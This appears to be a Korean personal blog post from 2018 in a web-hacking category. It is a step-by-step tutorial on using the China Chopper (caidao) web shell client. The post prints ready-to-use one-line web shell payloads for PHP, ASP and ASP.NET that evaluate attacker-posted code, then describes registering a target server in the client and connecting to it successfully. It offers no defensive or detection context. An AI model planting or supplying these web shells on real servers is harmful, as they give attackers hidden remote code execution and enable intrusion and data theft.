블로그 이미지
문슐랭 upip57@naver.com
진짜귀찮음

Notice

Recent Post

Recent Comment

Recent Trackback

Archive

calendar

1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
  • total
  • today
  • yesterday
2018. 1. 9. 21:35 해킹/웹해킹

caidao-20160620 웹쉘 



caldao.exe 를 실행합니다.

그러면 아래와 같이 초기화면을 확인 할 수 있습니다.




초기화면의 예시 중 php의 설정을 확인 해보도록 하겠습니다.





제 이름으로 하나 탭을 따로 만들 었습니다.



 



caidao-20160620 웹쉘_ 코드 삽입 


caidao-20160620 웹쉘은 3가지 언어를 이용해 삽입 할 수 있습니다.


php :        <?php @eval($_POST[\'moonho\']);?>


ASP:         <%eval request("moonho")%>


ASP.NET :  <%@ Page Language="Jscript"%><%eval(Request.item["moonho"],unsafe;)%> 





삽입 후 모습입니다.




caidao-20160620 웹쉘_ 서버접속



만든 탭에 들어간 후 add를 이용하여 서버를 입력해 줍니다.





이런식으로 설정을 해줍니다.





등록이 되었습니다.

접속 하도록 하겠습니다.




접속 성공.






참조 사이트 :


 http://blog.naver.com/PostView.nhn?blogId=koromoon&logNo=220809628069&categoryNo=15&parentCategoryNo=0&viewDate=¤tPage=1&postListTopCurrentPage=1&from=search


posted by 진짜귀찮음